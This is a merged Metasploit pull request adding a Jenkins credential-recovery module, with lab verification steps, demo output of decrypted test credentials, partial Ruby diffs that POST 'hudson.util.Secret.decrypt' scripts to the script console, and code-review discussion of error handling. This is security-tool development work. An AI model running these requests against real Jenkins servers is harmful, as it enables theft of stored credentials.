### PR TITLE
Add Jenkins Domain Credential Recovery Auxiliary Module

### PR DESCRIPTION
**Pull request by wchen-r7**
This module will collect Jenkins domain credentials, and uses the script console to decrypt each password if anonymous permission is allowed. It has been tested against Jenkins version 1.590, 1.633, and 1.638.
## Verification
- [x] Start a Windows box (such as Windows 7)
- [x] Make sure firewall is disabled, otherwise you won't be able to connect to Jenkins.
- [x] Download Jenkins: http://mirror.xmission.com/jenkins/windows/jenkins-1.638.zip (Archive is [here](http://mirror.xmission.com/jenkins/windows/))
- [x] Install Jenkins (this step is really straight-forward)
- [x] On the Windows box, open a browser and go to: `http://localhost:8080/credential-store/domain/_/`
- [x] Click on "Add Credentials"
- [x] This is kind of an UI bug with Jenkins, but if you don't actually see all the input fields (there should be Scope, Username, Password, and Description), choose a different Kind, and then choose Username with Password to make it reload. And then you should be able to see all the input fields.
- [x] Enter something for Username, Password, and Description (the last is optional)
- [x] Click OK, now you should at least have one credential on that global domain.
- [x] Start msfconsole
- [x] Do: `workspace -a jenkins``
- [x] Do: `auxiliary/gather/jenkins_cred_recovery`
- [x] Do: `set rhosts [IP]`
- [x] Do: `set verbose true`
- [x] Do: `check`
- [x] It should show the Jenkins version
- [x] It should say "The target service is running, but could not be validated"
- [x] Do: `run`
- [x] It should show you all the credentials
- [x] Do: `creds`
- [x] You should see all the recovered Jenkins credentials in the database
## Demo

```
msf auxiliary(jenkins_cred_recovery) > check

[*] 192.168.1.201:8080 - Found version: 1.633
[*] 192.168.1.201:8080 - The target service is running, but could not be validated.
msf auxiliary(jenkins_cred_recovery) > run

[*] 192.168.1.201:8080 - Found users for domain _: 21
[+] 192.168.1.201:8080 - Found credential: sinn3r:goodpassword (test account)
[+] 192.168.1.201:8080 - Found credential: user1:goodpassword1 (test)
[+] 192.168.1.201:8080 - Found credential: user2:goodpassword2 (blah)
[+] 192.168.1.201:8080 - Found credential: user3:goodpassword3 (test)
[+] 192.168.1.201:8080 - Found credential: user4:mypassword (blah)
[+] 192.168.1.201:8080 - Found credential: user5:password5 (test)
[+] 192.168.1.201:8080 - Found credential: user6:pass6 (test)
[+] 192.168.1.201:8080 - Found credential: user7:pass7 (test)
[+] 192.168.1.201:8080 - Found credential: user8:pass8 (asdf)
[+] 192.168.1.201:8080 - Found credential: user9:pass9
[+] 192.168.1.201:8080 - Found credential: user10:pass10
[+] 192.168.1.201:8080 - Found credential: user10:pass10
[+] 192.168.1.201:8080 - Found credential: user12:pass12
[+] 192.168.1.201:8080 - Found credential: user13:pass13
[+] 192.168.1.201:8080 - Found credential: user14:pass14
[+] 192.168.1.201:8080 - Found credential: user15:pass15
[+] 192.168.1.201:8080 - Found credential: user16:pass16
[+] 192.168.1.201:8080 - Found credential: user17:pass17
[+] 192.168.1.201:8080 - Found credential: user18:pass18
[+] 192.168.1.201:8080 - Found credential: user19:pass19
[+] 192.168.1.201:8080 - Found credential: user20:pass20
[*] Auxiliary module execution completed
msf auxiliary(jenkins_cred_recovery) >
```

### CODE REVIEW

File: modules/auxiliary/gather/jenkins_cred_recovery.rb [hunk 1]
```diff
@@ -0,0 +1,276 @@
...
+
+
+  # Returns the Jenkins version.
+  #
+  # @return [String] Jenkins version.
+  # @return [NilClass] No Jenkins version found.
+  def get_jenkins_version
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({ 'uri' => uri })
+    html = res.get_html_document
```
Comment (void-in) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: Should check for res before res.get_html_document

File: modules/auxiliary/gather/jenkins_cred_recovery.rb [hunk 2]
```diff
@@ -0,0 +1,276 @@
...
+  # @return [Array<Hash>] An array of account data such as id, username, kind, description, and
+  #                       the domain it belongs to.
+  def get_users
+    users = []
+
+    uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)
+    uri << '/'
+
+    res = send_request_cgi({ 'uri'=>uri })
+    html = res.get_html_document
```
Comment (void-in) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: Should check for res before res.get_html_document

File: modules/auxiliary/gather/jenkins_cred_recovery.rb [hunk 3]
```diff
@@ -0,0 +1,276 @@
...
+  # Returns the found encrypted password from the update page.
+  #
+  # @param id [String] The ID of a specific account.
+  #
+  # @return [String] Found encrypted password.
+  # @return [NilCass] No encrypted password found.
+  def get_encrypted_password(id)
+    uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')
+    res = send_request_cgi({ 'uri'=>uri })
+    html = res.get_html_document
```
Comment (void-in) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: Should check for res before res.get_html_document

File: modules/auxiliary/gather/jenkins_cred_recovery.rb (hunk 1 above)
Comment (wchen-r7) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: heheh, I was expecting someone to point this point. But nah, #get_html_document is nil-safe:

```
msf sinn3r $ irb
2.1.7 :001 > require 'nokogiri'
 => true 
2.1.7 :002 > Nokogiri::HTML(nil)
 => #<Nokogiri::HTML::Document:0x3fcb0984b188 name="document" children=[#<Nokogiri::XML::DTD:0x3fcb0984adc8 name="html">]> 
```

So you won't error out or backtrace due to a nil :-)

Comment (wchen-r7) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: oh wait a minute............... nooope, I am wrong.

File: modules/auxiliary/gather/jenkins_cred_recovery.rb [hunk 4]
```diff
@@ -0,0 +1,276 @@
...
+      'method'    => 'POST',
+      'uri'       => uri,
+      'vars_post' => {
+        'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'",
+        'json'   => {'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'"}.to_json,
+        'Submit' => 'Run'
+      }
+    })
+
+    if res && /javax\.servlet\.ServletException: hudson\.security\.AccessDeniedException2/ === res.body
```
Comment (void-in) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: In order to ensure res.get_html_document call works at line 172, we can use unless res here:
```ruby
unless res
  fail_with(Failure::Unknown, 'No response received from the server')
end
if /javax\.servlet\.ServletException: hudson\.security\.AccessDeniedException2/ === res.body
  vprint_error('No permission to decrypt password')
  return nil
end
html = res.get_html_document
...
```

**Comment by wchen-r7** [comment]
@void-in ok, fixed them all. Thanks!

File: modules/auxiliary/gather/jenkins_cred_recovery.rb (hunk 4 above)
Comment (wchen-r7) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: Corrected thanks.

File: modules/auxiliary/gather/jenkins_cred_recovery.rb (hunk 3 above)
Comment (wchen-r7) [inline modules/auxiliary/gather/jenkins_cred_recovery.rb]: Corrected, thanks.

**Comment by void-in** [comment]
@wchen-r7 Now you need to make get_*_document nil safe :)

**Comment by wchen-r7** [comment]
```raise``` some exception due to a timeout probably makes more sense than returning nil. Because when the client times out, all the user sees is undefined method for nil, not the actual problem. If it raises, the module does not need to do any extra handling, the exception message is automatically spot on about the problem. Another topic to discuss.........

**Comment by void-in** [comment]
@wchen-r7 So fail_with doesn't raise runtime exception? My understanding after reading the discussion of yours at https://github.com/rapid7/metasploit-framework/issues/5200 was that fail_with cancels the module execution immediately.

**Comment by wchen-r7** [comment]
@void-in Yeah it does. I was just saying that send_request_* should not return nil, should raise instead.

**Comment by wchen-r7** [comment]
Because what actually happens when a timeout occurs:

1. The timeout triggers an exception
2. send_request_* rescues the exception
3. send_request_* returns nil
4. The module uses the send_request_* checks nil
5. The module does a fail_with for the timeout...... which is actually just raising an exception

So many extra steps.

**Comment by void-in** [comment]
@wchen-r7 Ah. That make sense but we will have the exact same problem @FireFart pointed out with the scanner modules i.e. failure at one host will cause the module not to continue on other hosts. At least in the current form we don't (or shouldn't be doing) fail_with on scanner modules.

**Comment by wchen-r7** [comment]
@void-in On the module's level, you can rescue ```Msf::Exploit::Failed``` to keep the module going. I had to do something like this here: https://github.com/rapid7/metasploit-framework/pull/6255/files#diff-9d4b54677d6b1c7fe97f3cfcf5b33439R109

In the case of scanner modules... it might be a hassle to keep rescuing Msf::Exploit::Failed, so maybe better off doing this in the scanner mixin. I dunno, that issue probably still needs some more discussion.

**Comment by void-in** [comment]
@wchen-r7 Agreed. Adding it to the mixin is a good idea.

**Comment by FireFart** [comment]
@void-in @wchen-r7 I don't know if there is already an issue for this problem, but I think it should be tracked there. Do you want me to open it?

**Comment by wchen-r7** [comment]
@FireFart @void-in I created a feature request https://github.com/rapid7/metasploit-framework/issues/6279. It's up for discussion. We'll see if people agree :-)

**Pull request merged**